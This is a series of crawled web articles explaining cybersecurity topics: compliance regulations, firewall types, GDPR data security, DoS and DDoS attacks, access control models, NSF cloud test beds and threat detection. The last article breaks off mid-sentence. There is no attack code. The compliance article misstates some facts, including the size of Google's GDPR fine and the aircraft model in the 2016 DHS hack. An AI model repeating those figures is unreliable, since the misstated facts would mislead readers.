practices for protecting data. Potential customers often incline towards businesses that fully comply with existing laws. - Reduced risk: the guidelines and recommendations provided in compliance regulations allows companies to reduce cyber threats as they are tested and accepted internationally. - Avoiding fines and penalties: most compliance regulations are mandatory, and non-compliance leads to hefty penalties. Some, such as the GDPR, may fine organizations millions of dollars. Complying protects a business from such fines, and this is an advantage as far as its finances are concerned. - The rule of law: compliance regulations ensure that all businesses abide by the same rules. Compliance levels the field as enterprises can adopt equal security measures and be assured of adequate security. - Increased efficiency and improved economies of scale: compliance regulations are developed to provide businesses with cost-friendly yet effective security practices. At minimal costs, a business can deploy working security solutions and enjoy the same protection as a fortune 100 company. Existing Compliance Regulations and Requirements HIPAA (Health Insurance Portability and Accountability Act) is a regulation for securing the health data in organizations across all industries. Organizations often collect and store health data of their employees while healthcare institutions interact with patient data daily. Health information is highly sensitive and not subject to disclosure to unauthorized parties. As such, protective measures for securing it must be implemented. HIPAA compliance regulation contains a set of requirements that each organization must demonstrate a full understanding. HIPAA also requires businesses to implement training programs to equip employees with security and awareness skills. Training staff ensures they are aware of their security responsibilities when accessing information systems that house sensitive health data. Also, HIPAA requires companies to develop and maintain processes for detecting and preventing instances of security violations. Also, to be HIPAA compliant, an organization should, at all times, conduct risk analysis and assessments to identify security vulnerabilities in their systems. Implementing steps for managing and reducing identified risks should follow to ascertain information systems and infrastructures are no longer at risk. More so, HIPAA dictates that organizations should create sanction policies for dealing with non-compliant staff members. The Federal Information Systems Management Act (FISMA) was developed to enable federal agencies to secure their information systems. The regulation applies to all partners or contractors that conduct any business with the federal agencies. The main focus of FISMA regulation is to enable federal agencies to develop awareness and security training programs. The training programs aim to ensure that all users interacting with federal information systems are aware of the security guidelines and practices to adhere to. FISMA requires personnel working either in federal agencies or with the agencies, i.e., contractors, business partners, etc., to participate in the training programs to understand underlying security guidelines and procedures. Anyone accessing information or the federal information systems information must prove to have completed the training course and fully understands the course material. The personnel must also demonstrate an ability to put into practice the acquired skills and competently apply best practices to secure federal information. Payment Card Industry Data Security Standard (PCI-DSS) is a compliance regulation designed for organizations that deal with credit cards. The compliance standard provides businesses with security guidelines to implement to secure a customer’s financial information. PCI-DSS impacts businesses that process credit cards which require owners to input sensitive information in online platforms such as eCommerce websites. As a result, there is always a risk that cybercriminals may compromise such platforms, thus providing them with access to sensitive information. PCI-DSS compliant organizations have to implement all the security measures recommended to safeguard such client information. Some of the requirements of the standard include installing firewalls and configuring them to ensure a business protects the data and information of the cardholder. Also, PCI-DSS guides an organization on how to reset the default security parameters and system passwords of vendor-supplied systems. This is to ensure that new passwords are hard to crack and the security parameters are configured to meet the security needs of the organization. Also, PCI-DSS regulation tasks organizations with the responsibilities of implementing security measures for encrypting card information relayed over public and insecure networks. Other requirements include adopting access control strategies to restrict unauthorized access to card information and regularly testing the security of systems and processes. General Data Protection Regulation (GDPR) has become immensely popular since it was implemented in 2018. The regulation requires organizations to implement sufficient security protocols for securing personally identifiable information belonging to individuals from European Union zones. GDPR provision applies to all organizations in the world as long as they handle and process data belonging to an EU citizen. The regulation has compelled many organizations to comply to avoid the hefty fines that come along with non-compliance. Additionally, a company can be fined if insufficient security processes cause a data breach leading to loss or disclosure of personally identifiable information. Google was fined €44 million due to using user data to promote ads. GDPR requires companies to notify data owners of any intent of using their data for any reason. An organization must obtain the explicit consent of the data owner or risk being fined heavily. Also, GDPR encourages businesses to implement and maintain mechanisms for securing personal data. These include encryption, password protection, and access control measures. The regulation contains other requirements that purpose to boost data security. - NIST 800-53 The NIST (National Institute of Standards and Technology) publication 800-53 provides federal agencies with guidelines for securing their information systems. Additionally, organizations in the private sector use the same guidelines to harden their cyber defenses. The NIST 800-53 framework provides federal agencies and respective contractors with guidelines they can implement to ensure they comply with FISMA compliance regulations. The guidelines comprise of various controls which can aid in developing secure information systems that are resilient to cyber-attacks. Some of the proposed measures include the management, technical, and operational safeguards which, when implemented, can preserve the availability, confidentiality, and integrity of information and information management systems. Besides, NIST 800-53 provides security guidelines based on the security control baseline concept. The concept applies to identifying controls that meet the security needs of an organization. The baselines provide federal agencies and private organizations with considerations such as functional and operational needs, which also include common threats to organizational information systems. The NIST regulation further observes a tailoring process in which an organization can use to identify the controls that provide security according to the requirements of their information systems. Some of the security controls recommended in the compliance regulation include access control, awareness and training, audit and accountability, configuration management, contingency planning, incident response, personnel security, identification and authentication, and system and communications protection. Balancing Compliance Regulations and Cybersecurity Compliance regulations play an integral role in fostering cybersecurity. However, as witnessed with the recent enactment of GDPR (General Data Protection Regulation), many businesses have channeled resources and time in complying with the regulation rather than focusing on proper security guidelines. What’s worse, most regulations become outdated quickly, meaning that organizations will always struggle to be compliant with new standards and regulations. It is also important to note that cybercriminals have access to the regulations. They will always find a way to work around them to compromise the security guidelines contained in the guidelines. Essentially, companies exhaust finances, human resources, and time on compliance regulations with inherent vulnerabilities instead of focusing on fool-proof cyber defenses. But what can be done to address such issues in compliance regulations? Well, businesses have the responsibility of investing in the latest defensive trends to counter new threats and attacks. Maintaining multiple regulations to remain compliant without addressing cybersecurity defense can be detrimental to their security. To balance the two areas, that regulations and security, companies should invest in technologies that can achieve both purposes. An ideal example of an approach that can be explored to resolve this issue is artificial intelligence. AI systems are often used to understand vast quantities of information such as those contained in multiple regulatory compliances. Depending on the security needs of a company, this technology can ensure that it is always compliant with existing and emerging regulations. At the same time, AI has proved useful in developing cybersecurity tools like antivirus solutions and intelligent firewalls and intrusion prevention and detection systems. AI not only allows a company to kill two birds with one stone, but it also provides solutions to other challenges. Such include reducing the cost and labor needed to achieve full compliance and strong cybersecurity. The Future of Cybersecurity Recent cyberattacks have resulted in large-scale damages and widespread destruction. In 2017, WannaCry, one of the most significant ransomware attacks to date, hit many countries around the globe. United Kingdom’s National Health was the most affected as the attack crippled healthcare services across major healthcare facilities for close to a week. NotPetya ransomware attack followed in the same period. The incident targeted power and energy companies in Ukraine and oil companies in Russia, causing huge losses and damages. Such attacks demonstrate why researchers and governments are continuously working towards realizing better defensive strategies to stay a step ahead. However, although a lot is being done to provide working mitigations to rampant cybercrimes, the cyber threat environment will keep changing as new technologies emerge. These will be leveraged in both fighting cybercrimes and in developing more sophisticated attacking patterns. The entry of 5G Network Many countries are set to roll out 5G network connectivity and infrastructure convergence. Top among them include South Korea, China, and the United States. Huawei has already released smart TVs in Chinese markets that use 5G networks. Whereas the new network contains many benefits, most of which rely on its super-fast speed, 5G networks are poised to have the biggest challenges in cybersecurity landscapes. 5G networks not only provide faster internet speeds, but they are designed to connect billions of new devices every year in the future. The devices will utilize the internet to run critical infrastructure and applications using internet speeds that are at least 1000 times faster compared to current internet speeds. As a result, new architectures will emerge, and they will be used to connect whole geographic locations and communities, industries, and critical infrastructures. At the same time, the 5G networks will significantly alter cyber threat landscapes. Most of the attacks perpetrated today are financially motivated but without causing real and physical damages to infrastructures or locations. With 5G networks, cyber-attacks might cause severe physical destruction that might destabilize a country’s economy or cause wanton loss of life. Worse still, such attacks will be executed using the same quick 5G speeds, such that it will almost be impossible to detect and prevent them before they occur. Moreover, 5G networks will enable cyber adversaries to discover vulnerabilities and exploit them to execute attacks instantly. Now, despite this being similar to the techniques used today, the main difference is that entire enterprise, critical infrastructures such as road networks for autonomous and self-driving vehicles, and other infrastructures needed to run a smart city will be connected. The destruction that such attacks will cause if successful can only be imagined. Some examples of such attacks are already happening today. For instance, the Department of Homeland Security hacked into the systems of a Boeing 787 passenger aircraft in 2016. The plane was parked in Atlantic City, and the hack was done remotely without relying on insider help. Also, a ransomware attack targeting the City of Baltimore locked out over 10000 employees from their workstations. Such attacks might not have caused any destruction on the victims. That would, however, not be the case had they locked out 10000 self-driving cars from accessing critical infrastructure systems. They would be unable to communicate with each other and from accessing navigational systems, meaning that they would cause massive accidents or massive traffic congestions. In the coming future, 5G networks will lead to the development of smart cities and infrastructures. These will result in an emergence of interconnected critical systems at an entirely new scale, including automated waste and water systems, driverless vehicles depending on intelligent transport systems, automated emergency services, and workers. They will all interdepend on each other. As much as these 5G enabled solutions will be highly connected, they will likely to be highly vulnerable. During the 2017 WannaCry attack, the ransomware took several days for it to spread globally. 5G networks will enable such networks to spread at a speed of light. 5G networks will revolutionize the world immensely but also potentially drive cybercrimes to real-world scenarios, resulting in consequences yet to be known. The need for developing real-time detection and preventive measures, especially with the adoption of 5G networks, cannot be underscored. Artificial intelligence technologies provide crucial components required for the world to realize a global immunity and security as far as cyber-attacks are concerned. Artificial intelligence is already being used to innovate and develop cybersecurity solutions that can operate at a pace and scale that can secure digital prosperity in the future. AI-powered security solutions will be leveraged to achieve top-notch efficiencies in detecting and responding to cyber-attacks, provide real-time mitigation measures to cyber threats and instant situational awareness, and automate processes for risk assessments, threat detection, and mitigation, and so on. However, many reports today indicate that cybercriminal communities are seizing and exploiting artificial intelligence security solutions as soon as they are developed. This poses new challenges in the race for developing working solutions to global cyber threat landscapes. Cyber actors using artificial intelligence to execute different crimes might instantly bypass industrial technical controls developed over several decades. For example, in the financial industry, criminals may soon develop intelligent malware programs capable of capturing and exploiting voice synthesis solutions. This will allow the mimicking of the human behavior captured in biometric data such that criminals can bypass the implemented authentication procedures for securing individual bank accounts. Besides, using artificial intelligence for criminal activities will most likely lead to the emergence of new breeds of cyber-attacks and attack cycles. Malicious actors will target and deploy such breaches where they will cause the highest impacts, and using means which industries across the divide never thought would be possible. To mention just a few, artificially intelligent attacks might be used in biotech industries to steal or manipulate DNA codes. They might also be used to destabilize the mobility of unmanned vehicles, and in healthcare systems, where smart ransomware programs will be timed to execute when systems are most vulnerable, thus causing the highest impact. Combating the emerging cybersecurity trends will most likely cause biometrics to be among the most used strategies for security. Currently, biometrics are playing a central role in securing devices like laptops and smartphones, or for physical security where iris and fingerprint scans are used to secure sensitive and classified areas. Biometrics will continue being used in the future to develop next-generation authentication mechanisms. Adopting such measures will necessitate the acquisition of enormous data volumes of individuals and their activities. Fingerprint, iris scans, and voice recognition security will not be adequate, and biometrics will include other details such as body movement and walking styles. This will only cause cybercriminals to, however, target new generation biometrics data. Rather than focusing on targeting data like personally identifiable information, including contact details, social security numbers, or official names, attacks will focus on acquiring data used in biometrics security. What Next? New Measures and Compliance Regulations So, the main question is what’s next for cybersecurity in the future? First, it is essential to note that cybercriminals have been executing low-risk attacks where there are high-rewards and minimal or zero attribution. This has caused organizations to mostly depend on traditional responses as most have provided practical solutions so far. In the coming years, emerging and transformative technologies will significantly alter the cyber threat landscapes. Understanding how to best secure against the expected rise of new generation cyber-attacks and threats will first require we understand the extents to which cyber landscapes will change and the transformation of risk environments. Such an urgent and critical analysis can only be accomplished through persistent research for evidence-backed results. The expertise which security professionals, academic giants, and policy makers possess will be integral to developing exceptional measures for curbing future cybercrime activities. Ultimately, new compliance regulations are necessary as a result of the changing cybersecurity landscape. At the same time, the responsibility for complying will increase as a result of the new laws and regulations as well as user demands and public opinion. Organizations will remain challenged to incorporate the new requirements into their business processes, including their communications, employees, tools, and infrastructure. - https://www.bbc.com/news/technology-46944696 ↑ - https://www.statista.com/statistics/471264/iot-number-of-connected-devices-worldwide/ ↑ - https://www.npr.org/2019/05/21/725118702/ransomware-cyberattacks-on-baltimore-put-city-services-offline?t=1561030041838 ↑
<urn:uuid:6d4cd787-487a-447e-aefd-05d2ea01a3f3>
CC-MAIN-2022-40
https://cyberexperts.com/compliance-regulations-and-the-future-of-cybersecurity/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00334.warc.gz
en
0.935402
3,884
3.140625
3
There are several types of firewalls, and one of the major challenges that companies face when trying to secure their sensitive data is finding the right one. First off, a firewall – a network firewall – is a network appliance designed to define and enforce a perimeter. They can be deployed at the connection between an organization’s internal network and the public Internet or internally within a network to perform network segmentation. A firewall sits at the perimeter of a protected network, and all traffic crossing that boundary flows through the firewall. This provides it with visibility into these traffic flows and the ability to block any traffic that violates the predefined access control list (ACLs) or is otherwise deemed a potential threat to the network. A firewall is important because it acts as the network’s first line of defense. An effective firewall can identify and block a wide variety of threats, preventing them from reaching the internal network. This decreases the amount of malicious traffic that other security solutions must inspect and the potential threats faced by the internal network. Pros and Cons Firewalls can be classified in a few different ways. Three important concepts to understand when selecting a firewall solution are the difference between stateful and stateless firewalls, the various form factors in which firewalls are available, and how a next-generation firewall (NGFW) differs from traditional ones. The oldest and simplest distinction between firewalls is whether it is stateless or stateful. A stateless firewall inspects traffic on a packet-by-packet basis. The earliest firewalls were limited to checking source and destination IP addresses and ports and other header information to determine if a particular packet met simple access control list requirements. This enabled firewalls to block certain types of traffic from crossing the network boundary, limiting their exploitability and ability to leak sensitive data. Over time, firewalls grew more sophisticated. Stateful firewalls are designed to track details of a session from its beginning to its end. This enabled these firewalls to identify and block packets that don’t make sense in context (such as a SYN/ACK packet sent without a corresponding SYN). The greater functionality provided by stateful firewalls means that they have completely replaced stateless ones in common usage. Traditional types of firewalls (stateful or stateless) are designed to filter traffic based upon predefined rules. This includes checking packet header information and ensuring that incoming or outgoing packets logically fit into the current connection’s flow. A next-generation firewall (NGFW) includes all of this functionality but also incorporates additional security features. A NGFW adds additional security solutions such as application control, an intrusion prevention system (IPS), and the ability to inspect suspicious content in a sandboxed environment. This enables it to more effectively identify and block incoming attacks before they reach an organization’s internal network. Another way to distinguish between different types of firewalls is based on how they are implemented. Firewalls generally fall into three categories: #1. Hardware Firewalls: These firewalls are implemented as a physical appliance deployed in an organization’s server room or data center. While these firewalls have the advantage of running as “bare metal” and on hardware designed specifically for them, they are also constrained by the limitations of their hardware (number of network interface cards (NICs), bandwidth limitations, etc.). #2. Software Firewalls: Software firewalls are implemented as code on a computer. These firewalls include both the firewalls built into common operating systems and virtual appliances that contain the full functionality of a hardware firewall but are implemented as a virtual machine. #3. Cloud Firewalls: Organizations are increasingly moving critical data and resources to the cloud, and cloud-native firewalls are designed to follow suit. These virtual appliances are specifically designed to be deployed in the cloud and may be available as either standalone virtual machines or as a Software as a Service (SaaS) offering. Each of these different firewall form factors has its advantages and disadvantages. While a hardware firewall has access to optimized hardware, its capabilities can also be constrained by the hardware it uses. A software firewall may have slightly lower performance but can be easily updated or expanded. A cloud firewall, however, takes advantage of all of the benefits of the cloud and can be deployed near to an organization’s cloud-based resources. The firewall has undergone a series of transformations as the evolution of enterprise networks and the cyber threat landscape have caused organizations’ security requirements to change. The latest of these changes is of course the increased adoption of cloud computing and remote work. Cloud firewalls are a step in the right direction toward meeting enterprise cloud security needs. However, as enterprise networks continue to evolve, organizations will continue to move to deploy a next-generation firewall as part of an integrated Secure Access Service Edge (SASE) solution. In general, a next-generation firewall is always the right choice for protecting an organization’s network. Beyond that, the details (such as the desired form factor) depend upon the organization’s business needs and the firewall’s intended deployment location. To learn more about NGFWs and what to look for when shopping for one, check out this buyer’s guide. Then, to learn more about how Check Point solutions can help to secure your network, contact us and schedule a demonstration.
<urn:uuid:ea200b8c-738e-4205-b630-f3ada26ecb48>
CC-MAIN-2022-40
https://www.checkpoint.com/cyber-hub/network-security/what-is-firewall/the-different-types-of-firewalls/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00334.warc.gz
en
0.935457
1,121
3.203125
3
Everything you need to know about data security for GDPR The European Union’s General Data Protection Regulation (GDPR) poses the biggest change to the regulatory landscape of data privacy. GDPR aims to unify data protection all across the EU and establish data privacy and protection as a fundamental right. Penalties for non-compliance may reach up to 4% of a company’s worldwide turnover or €20M. ANY organization that handles EU citizens’ personal data, regardless of whether or not it operates in the EU is affected. The pseudonymisation and encryption of personal data The ongoing confidentiality, integrity, availability and resilience of processing systems and services. The ability to restore the availability and access to personal data in a timely manner in the event of a physical or technical incident. A process for regularly testing, assessing and evaluating the effectiveness of technical and organizational measures for ensuring security. The European Union’s General Data Protection Regulation (GDPR) poses the biggest change to the regulatory landscape of data privacy. GDPR aims to unify data protection all across the EU and establish data privacy and protection as a fundamental right.DOWNLOAD WHITEPAPER GDPR puts focus on ownership. Identify your technical lead, DPO, and executive sponsor to bear responsibility for data privacy programs. Map data flows and relevant systems to mark various structures, files and systems where different levels of privacy need to be maintained. Include 3rd parties and backup systems. Establish robust audit trail of activity on in-scope systems, especially data access and admin activity, as well as rich logging across all protections in order to identify potential breach activity. Specify controls set on in-scope systems and define implementation projects. Prevent sensitive data from leaving the organization and educating your users on the correct behavior Encrypts sensitive documents and protects data on-premise and in the cloud Strong encryption ensures only authorized users are given access to information stored on desktops, laptops, and removable media. Keep your security continuously up to the date with GDPR best practices Visibility into security incidents and a clear audit trail
<urn:uuid:ef1cd1c2-6d7c-4b4a-8a1c-1c37d618fcfb>
CC-MAIN-2022-40
https://www.checkpoint.com/solutions/gdpr/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00334.warc.gz
en
0.873474
436
2.515625
3
The term DoS stands for Denial of Service, which is a type of cyber attack where the target, such as a website, is flooded with traffic in order to disrupt its normal operations. Two of the general goals of DoS attacks are flood attacks where the target is flooded with traffic and attacks where the goal is to crash the targeted service. Signs of a denial of service attack include: Although a slow internet connection, crashing and difficulties in using certain services can be indicators of a denial of service attack, there can be a harmless explanation for these things as well. A website may slow down or crash when it suddenly receives more traffic than it is prepared for. For example, an online store is probably well prepared for a large number of shoppers during special sales, so the unusually high number of legitimate users is unlikely to have a negative impact on the site’s performance. A denial of service attack on the other hand happens unexpectedly and is something the site is unlikely to expect. A simple denial of service attack can also be used in online gaming to gain an unfair advantage against opponents by disrupting their internet connection. In a situation like this, one way to prevent a denial of service attack from happening is by changing your IP-address. Whereas a denial of service attack can be carried out by a single device, distributed denial of service attacks, or DDoS attacks, use multiple devices to attack their target. Because of this, DDoS attacks are able to overwhelm their targets with even greater amount of requests than a regular DoS attack. One way that DDoS attacks are able to use multiple sources at the same time is with something known as a botnet. Simply put, botnets are networks of devices that have been hijacked to be used in a distributed denial of service attack. The devices in a botnet are infected with a piece of malware that takes over its victim. When the DDoS attack begins, the devices in a botnet all flood the attack’s target with requests simultaneously. As a consequence, the targeted service, such as a website reaches its capacity and its performance is greatly hindered. Nowadays, all sorts of devices can be connected to the internet, including webcams, home appliances, speakers and even smart toilets. This refers to Internet of Things or IoT. Although IoT provides numerous opportunities, it poses some threats as well. When devices are connected to the internet they are also susceptible to malware and can thus be used to carry out DDoS attacks as a part of a botnet. One notable example of a botnet that exploited IoT devices is Mirai. It is responsible for one of the largest and best-known DDoS attacks on many large and widely used websites such as Twitter and Netflix. The devices used in the Mirai-botnet attack included routers and webcams. Although DoS and DDoS attacks are used for much of the same purpose, there are some notable differences between these two. Normal denial of service attacks that do not require an expansive botnet are on the rise as the tools to pull off a DoS attack have become more accessible. With a user-friendly user interface, using these tools to flood servers with traffic does not require expert-level technical skills. We can make a general distinction between three types of DDoS attacks. These are volumetric, application layer and protocol attacks. Let’s look at these three types of DDoS attacks in more detail. A volumetric DDoS attack aims to consume as much bandwidth with traffic as possible. The amount of traffic can be hundreds of gigabytes or even terabytes every second. The goal of such an attack is to cause congestion on the targeted service or website. However, volumetric attacks can also act as a way to hide other types of suspicious activity. Application layer attacks (also known as layer 7 attacks) target specific points in the application layer. What makes an application layer attack different is that it is not targeted at the system as a whole but a specific point in it. Whereas an application layer attack takes place in the so-called 7th layer, a protocol DDoS attack targets layers 3 and 4. This is the target server’s networking layer. Protocol DDoS attacks are used to use up resources of the target’s firewall, for instance. DDoS bots are malware just like any other. That’s why private persons should also take action to defend themselves against them. F‑Secure TOTAL comes with an antivirus that keeps you safe from malware that can make your device a part of a botnet. Meanwhile, F‑Secure’s versatile VPN allows you to browse online safely and in private. Read more about F‑Secure TOTAL and try it for free.
<urn:uuid:44a97274-cd9d-44d6-9c53-7e936c05c048>
CC-MAIN-2022-40
https://www.f-secure.com/us-en/home/articles/what-is-ddos
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00334.warc.gz
en
0.957366
970
3.390625
3
Data confidentiality, availability, controllability and integrity are the main research contents of data security technology. The theoretical basis of data confidentiality is cryptography, and availability, controllability, and integrity are important guarantees for data security. Without the latter to provide technical guarantees, no matter how strong the encryption algorithm is, it is difficult to ensure data security. As an important carrier of information, data plays a very important role in information security. In order to be able to use data in a safe and controllable manner, a variety of technical means are required as guarantees. These technical means generally include various technical means such as access control technology, encryption technology, data backup, and recovery technology, and system restoration technology. Organizations must determine the appropriate access control model to adopt based on the type and sensitivity of data they’re processing, says Wagner. There are 4 types of access control. Among the following 4 types of access control, role-based access control (RBAC) is the most common model today, and the most recent model is known as attribute-based access control (ABAC): - Discretionary access control (DAC): With DAC models, the data owner decides on access. DAC is a means of assigning access rights based on rules that users specify. - Mandatory access control (MAC): MAC was developed using a nondiscretionary model, in which people are granted access based on an information clearance. MAC is a policy in which access rights are assigned based on regulations from a central authority. - Role-Based Access Control (RBAC): RBAC grants access based on a user’s role and implement key security principles, such as “least privilege” and “separation of privilege.” Thus, someone attempting to access information can only access data that are deemed necessary for their role. - Attribute-Based Access Control (ABAC): In ABAC, each resource and user is assigned a series of attributes including the time of day, position and location, which are used to make a decision on access to a resource. The access control strategy is a series of rules used to control and manage the access of subjects to objects. It reflects the security requirements of information systems. The formulation and implementation of the security policy revolve around the relationship between the subject, the object, and the security control rule set. In the formulation and implementation of the security policy, the following principles must be followed: - Least Privilege: It means the subject’s power in accordance with minimizing the rights required by the subject when a subject performs an operation. It can restrict the subject’s authorization behavior to the greatest extent and can avoid the dangers from unexpected events, errors and unauthorized use of the subject. - Least Leakage: It refers to the principle of minimizing the information that the subject needs to know when performing the task, and assigning the power to the subject. - Multi-level Security Strategy: It refers to the data flow and permission control between the subject and the object are divided according to the top-secret, secret, confidential, restricted, and no-level security levels. The advantage is to avoid the spread of sensitive information. LIFARS’ CISO as a Service is designed to address organizations’ information security leadership needs. Our CISOs are highly skilled at establishing, improving, and transforming Cybersecurity Programs focused on maximizing business values by minimizing risks and optimizing opportunities. LIFARS’ astute Information Risk Management leaders can discern security needs, design effective solutions and programs, and deliver results while steering through challenging organizational culture. Our over 20 years of security, risk, and compliance leadership experience encompassed various industries and globally dispersed organizations. Below are examples of some key areas delivered via LIFARS vCISOs: - Information Risk Management - Cybersecurity Strategy - Cybersecurity Governance - Cybersecurity Operations Management
<urn:uuid:49405528-7dc1-4fb0-ba97-cf6e98e0784b>
CC-MAIN-2022-40
https://www.lifars.com/2020/05/what-is-access-control/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00334.warc.gz
en
0.927084
837
3.296875
3
The National Science Foundation announced two $10 million projects to create cloud computing test beds that will help develop novel cloud architectures and applications. The National Science Foundation recently announced two $10 million projects to create cloud computing test beds – to be called Chameleon and CloudLab – that will help develop novel cloud architectures and new applications. The awards complement private sector efforts to build cloud architectures that can support real-time and safety-critical applications like those used in medical devices, power grids, and transportation systems, NSF said in its announcement. They are part of the NSFCloud program that supports research into novel cloud architectures to address emerging challenges including real-time and high-confidence systems. Chameleon, to be co-located at the University of Chicago and the University of Texas at Austin, will consist of 650 cloud nodes with 5 petabytes of storage. Researchers will be able to configure slices of Chameleon as custom clouds to test the efficiency and usability of different cloud architectures on a range of problems, from machine learning and adaptive operating systems to climate simulations and flood prediction. The test bed will allow "bare-metal access," an alternative to virtualization technologies currently used to share cloud hardware, allowing for experimentation with new virtualization technologies that could improve reliability, security and performance. Chameleon is unique for its support for heterogeneous computer architectures, including low-power processors, general processing units and field-programmable gate arrays, as well as a variety of network interconnects and storage devices, NSF said. Researchers can therefore mix and match hardware, software and networking components and test their performance. This flexibility is expected to benefit many scientific communities, including the growing field of cyber-physical systems or the Internet of Things, which integrates computation into physical infrastructure. "Like its namesake, the Chameleon test bed will be able to adapt itself to a wide range of experimental needs, from bare metal reconfiguration to support for ready-made clouds," said Kate Keahey, a scientist at the Computation Institute at the University of Chicago and principal investigator for Chameleon. "Furthermore, users will be able to run those experiments on a large scale, critical for big data and big compute research.” The CloudLab test bed is a large-scale distributed infrastructure based at the University of Utah, Clemson University and the University of Wisconsin, on top of which researchers will be able to construct many different types of clouds. Each site will have unique hardware, architecture and storage features, and will connect to the others via 100 gigabit/sec connections on Internet2's advanced platform. CloudLab will also support OpenFlow (an open standard that enables researchers to run experimental protocols in campus networks) and other software-defined networking technologies. CloudLab will provide approximately 15,000 processing cores and in excess of 1 petabyte of storage at its three data centers. Each center will comprise different hardware, facilitating additional experimentation. In that capacity, the team is partnering with HP, Cisco and Dell to provide diverse platforms for research. Like Chameleon, CloudLab will feature bare-metal access. Over its lifetime, CloudLab is expected to run dozens of virtual experiments simultaneously and to support thousands of researchers. "CloudLab will be a facility where researchers can build their own clouds and experiment with new ideas with complete control, visibility and scientific fidelity,” said Robert Ricci, a research assistant professor of computer science at the University of Utah and principal investigator of CloudLab. Ultimately, the goal of the NSFCloud program and the two new test beds is to advance the field of cloud computing broadly. The awards will help researchers develop new concepts, methods and technologies to enable infrastructure design and execution.
<urn:uuid:2f8c7b5c-da38-4ad8-a20d-31dda618b1d9>
CC-MAIN-2022-40
https://gcn.com/cloud-infrastructure/2014/08/nsf-seeds-cloud-research-test-beds/297098/?oref=gcn-next-story
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335573.50/warc/CC-MAIN-20221001070422-20221001100422-00334.warc.gz
en
0.929681
757
2.890625
3
The severity and sophistication of cyber threats continue to evolve at an alarming pace, raising questions about organizations’ ability to defend against distributed attacks. Enterprise networks and systems are lucrative targets for malicious actors who steal sensitive data or hold companies’ ransom using malware. Currently, it takes the average business around 197 days to identify a security breach and 69 days to contain it, according to IBM’s 2020 Cost of a Data Breach Report. This prolonged incident response leaves organizations vulnerable to significant financial and operational losses, along with costly unplanned downtime and diminished productivity. To offset the risk of large-scale security breaches, companies must understand how to quickly and efficiently detect and mitigate cyber threats. But given the growing number of hacking methods and social engineering tactics, how can businesses create a genuinely useful cyber security program? Top cyber security threats: 2020 and beyond Cyber attack detection and mitigation strategies use threat intelligence by keeping track of security trends and high-profile hacking incidents. Organizations can quickly adapt to new attack vectors and enhance their IT postures. Since every industry relies on different digital technologies, business leaders need to understand how their networks and systems are exploitable. For example, the manufacturing industry is undergoing a significant transformation, thanks to the industrial internet of things (IIoT) and wireless connectivity. While these advancements have helped boost productivity, they’ve also introduced new security concerns that can be hard to mitigate. According to the National Institute of Standards and Technology, the five most common cyber threats to manufacturers include: - Identity theft. - Phishing attacks. - Spear phishing. - Malicious spam. - Compromised web applications and web pages. Alongside these threats, manufacturers must also guard against ransomware, brute-force attacks, data breaches, and other complex hacking techniques that are ubiquitous across industry lines. Cyber criminals are continually looking for new opportunities to turn crises in their favor, demonstrated by the ongoing COVID-19 pandemic. In early April 2020, the Department of Homeland Security and the Cybersecurity and Infrastructure Security Agency released a joint alert, warning businesses about the growing use of “COVID-19-related themes” by malicious actors. These cyber threats include: - Phishing attacks that use COVID-19 as a lure. - Malware distribution through emails related to coronavirus news. - Brute-force attacks against remote access and teleworking infrastructure. - Infected links on newly registered domains related to COVID-19. These findings support a recent survey from CSO Online, which found that the volume, severity, and scope of cyber attacks have increased 26% since mid-March. To stay one step ahead, organizations must understand how to detect and mitigate cyber threats, prioritize cyber security awareness, and enhance their threat intelligence activities. Cyber attack prevention: The role of risk assessments The first step to improving any cyber security program is to conduct a thorough risk assessment that takes all devices, data stores, networks, and systems into account. You should perform risk assessment activities annually to ensure organizations know both traditional and emergent cyber attack methods. Under the NIST’s risk management framework, organizations should perform the following tasks: - Categorize potential threats: By collecting information on cyber threat sources, events, and vulnerabilities, organizations can categorize different attack vectors based on their potential impact. This information can help identify high-risk threats and provide a foundation for detection and mitigation strategies. - Select essential security controls: Using gathered threat intelligence, organizations can select baseline security controls for their data, networks, and systems. Over time, you should refine these security controls based on new threat and vulnerability information. - Implement threat detection and mitigation tools: Companies should implement advanced cyber security tools to protect against specific threats after establishing baseline controls. These include vulnerability management software, threat detection systems, remote monitoring platforms, and more. - Assess current IT posture: After making the above improvements, IT administrators should conduct a follow-up assessment to ensure all new security systems function as intended. These results can also help tailor incident response plans to particular threats and vulnerabilities. - Monitor performance: Even after completing the risk assessment, companies must continue to monitor their networks and systems for new vulnerabilities and configuration flaws. This innovation process can help key decision-makers evaluate the effectiveness of security controls, the impact of changes to IT systems, and whether they’re compliant with federal legislation. Cyber security is all about preparation and prevention. By remaining proactive, organizations can implement evidence-based security processes and stay one step ahead of malicious actors. Of course, they know how to detect and mitigate cyber threats is also crucial, as even the most comprehensive cyber security defenses will experience an incident sooner or later. How to detect cyber threats Cyber threat detection requires strong internal IT policies and advanced monitoring. While some companies utilize manual processes, research from IBM found that security automation can significantly reduce the cost of breaches. The average breach cost for automation-focused companies stands at $2.88 million. In contrast, those without these tools have an estimated $4.43 million price. In terms of specific threat detection tools, the NIST recommends prioritizing the following: - Anti-virus software: Installing anti-virus software capable of detecting malware, spyware, ransomware, and malicious email attachments are essential to warding off a wide range of cyber threats. These mechanisms can help safeguard sensitive data, networks, and systems from malicious code by alerting IT administrators about high-risk incidents. - Threat detection logs: Most cyber security platforms offer advanced logging capabilities to help organizations detect suspicious activity on their networks and systems. Security professionals can conduct detailed investigations that touch on network security and computer security simultaneously by maintaining and reviewing these logs. Other key threat detection strategies include: - Penetration testing: Testing allows companies to identify vulnerabilities in their systems, networks, and web applications. By filling the shoes of malicious actors, internal security experts can probe their IT environments for unpatched software, configuration issues, authentication errors, and more. - Automated monitoring systems: Alongside manual processes, companies can enhance their IT posture by integrating automated threat detection systems. Asset management platforms can help organizations keep track of device performance and activity. Simultaneously, network security tools can monitor web traffic in real-time. These systems will 